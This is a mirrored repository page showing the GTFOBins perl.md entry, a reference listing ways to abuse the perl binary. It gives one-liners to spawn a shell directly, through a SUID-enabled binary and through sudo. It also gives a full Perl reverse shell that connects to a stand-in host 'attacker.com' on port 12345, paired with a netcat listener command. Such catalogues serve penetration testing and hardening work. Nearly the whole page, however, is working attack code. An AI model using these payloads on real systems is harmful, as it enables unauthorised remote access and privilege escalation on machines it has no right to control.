This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-07 00:01:33 +01:00
Code
Issues
14c8781f2d
GTFOBins.github.io
/
_gtfobins
/
perl.md
Andrea Cardaci
e1cd3aed68
Fix YAMLs according to YAMLlint
2018-07-16 15:01:50 +02:00
617 B
Raw
Blame
History
functions
execute-interactive
reverse-shell-interactive
suid-enabled
sudo-enabled
code
perl -e 'exec "/bin/sh";'
description
code
Run `nc -l -p 12345` on the attacker box to receive the shell.
export RHOST=attacker.com export RPORT=12345 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
code
./perl -e 'exec "/bin/sh";'
code
sudo perl -e 'exec "/bin/sh";'